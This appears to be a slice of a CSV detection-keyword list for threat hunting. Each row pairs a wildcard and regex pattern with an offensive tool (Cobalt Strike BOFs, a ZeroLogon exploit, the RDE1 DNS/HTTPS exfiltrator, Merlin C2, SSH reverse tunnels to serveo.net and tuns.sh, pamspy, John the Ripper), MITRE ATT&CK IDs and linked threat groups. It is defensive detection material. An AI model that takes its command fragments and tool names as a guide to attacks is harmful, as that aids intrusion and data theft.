"*src/Remote/sc_create/*",".{0,1000}src\/Remote\/sc_create\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60100"
"*src/Remote/sc_delete/*",".{0,1000}src\/Remote\/sc_delete\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60101"
"*src/Remote/sc_start/*",".{0,1000}src\/Remote\/sc_start\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60102"
"*src/ShellGhost.c*",".{0,1000}src\/ShellGhost\.c.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","60103"
"*Src/Spray-AD*",".{0,1000}Src\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60104"
"*src/tests/NESSIE/*",".{0,1000}src\/tests\/NESSIE\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60105"
"*src/zerologon.c*",".{0,1000}src\/zerologon\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","60107"
"*src\CMLootOut\*",".{0,1000}src\\CMLootOut\\.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","60108"
"*src\pamspy.c*",".{0,1000}src\\pamspy\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","60109"
"*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","60110"
"*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","N/A","10","10","268","59","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z","60111"
"*srde dns -*",".{0,1000}srde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60113"
"*srde https -*",".{0,1000}srde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60114"
"*srde_release dns -k *",".{0,1000}srde_release\sdns\s\-k\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60115"
"*srde_release https -i *",".{0,1000}srde_release\shttps\s\-i\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60116"
"*srv.(MerlinServer).Exe*",".{0,1000}srv\.\(MerlinServer\)\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","60117"
"*srvsvc_##*",".{0,1000}srvsvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","60118"
"*ss -tunlp || netstat -tunlp*127.0.0.1*",".{0,1000}ss\s\-tunlp\s\|\|\snetstat\s\-tunlp.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","60119"
"*sse-secure-systems/TeamsEnum*",".{0,1000}sse\-secure\-systems\/TeamsEnum.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","1","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","60121"
"*ssf.exe -D * -p * 127.0.0.1*",".{0,1000}ssf\.exe\s\-D\s.{0,1000}\s\-p\s.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","N/A","10","10","1622","238","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z","60122"
"*ssfd.exe -p *",".{0,1000}ssfd\.exe\s\-p\s.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","N/A","10","10","1622","238","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z","60123"
"*ssh -L *:localhost:80 -N imgs.sh*",".{0,1000}ssh\s\-L\s.{0,1000}\:localhost\:80\s\-N\simgs\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","60130"
"*ssh -N -R 4567:localhost:*root*",".{0,1000}ssh\s\-N\s\-R\s4567\:localhost\:.{0,1000}root.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","60131"
"*ssh -o ProxyCommand=""wstunnel*",".{0,1000}ssh\s\-o\sProxyCommand\=\""wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","60134"
"*ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R *serveo.net*",".{0,1000}ssh\s\-o\sStrictHostKeyChecking\=no\s\-o\sServerAliveInterval\=60\s\-R\s.{0,1000}serveo\.net.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","60135"
"*ssh -p 2222 -R *:80:localhost:8080 tuns.sh*",".{0,1000}ssh\s\-p\s2222\s\-R\s.{0,1000}\:80\:localhost\:8080\stuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","60136"
"*ssh -p 2222 -R 80:localhost:8080 tuns.sh*",".{0,1000}ssh\s\-p\s2222\s\-R\s80\:localhost\:8080\stuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","60137"
"*ssh -p 2222 tuns.sh*",".{0,1000}ssh\s\-p\s2222\stuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","60138"
"*ssh -R *:80:localhost:8000 tuns.sh*",".{0,1000}ssh\s\-R\s.{0,1000}\:80\:localhost\:8000\stuns\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","60140"
"*ssh_key_privesc(payload*",".{0,1000}ssh_key_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","60143"
"*SSH_Keylogger_Stub.exe*",".{0,1000}SSH_Keylogger_Stub\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60144"
"*ssh_write_privesc(payload*",".{0,1000}ssh_write_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","60145"
"*SSH-2.0-OpenSSH_6.7p2*",".{0,1000}SSH\-2\.0\-OpenSSH_6\.7p2.{0,1000}","offensive_tool_keyword","OpenSSH Trojan","openssh trojan - non existing banner in official OpenSSH - only observed in compromised routers (APT28)","T1071 - T1059 - T1021 - T1065 - T1090 - T1563 - T1132 - T1078","TA0002 - TA0005 - TA0011","Moobot OpenSSH Trojan","APT28","Malware","https://www.ic3.gov/Media/News/2024/240227.pdf","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60146"
"*ssh2john *",".{0,1000}ssh2john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60147"
"*ssh2john.py*",".{0,1000}ssh2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60148"
"*sshamble scan *",".{0,1000}sshamble\sscan\s.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60149"
"*sshamble*badkeys*",".{0,1000}sshamble.{0,1000}badkeys.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60150"
"*sshamble/badkeys*",".{0,1000}sshamble\/badkeys.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60151"
"*sshamble-main.zip*",".{0,1000}sshamble\-main\.zip.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60152"
"*ssh-auditor*",".{0,1000}ssh\-auditor.{0,1000}","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","N/A","7","611","84","2023-12-18T21:46:18Z","2016-11-08T22:47:38Z","60153"
"*sshbrute.py*",".{0,1000}sshbrute\.py.{0,1000}","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","60154"
